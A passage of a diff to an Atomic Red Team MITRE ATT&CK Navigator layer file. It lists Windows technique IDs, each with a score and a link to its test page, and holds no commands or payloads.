aryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]}
\ No newline at end of file
+{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"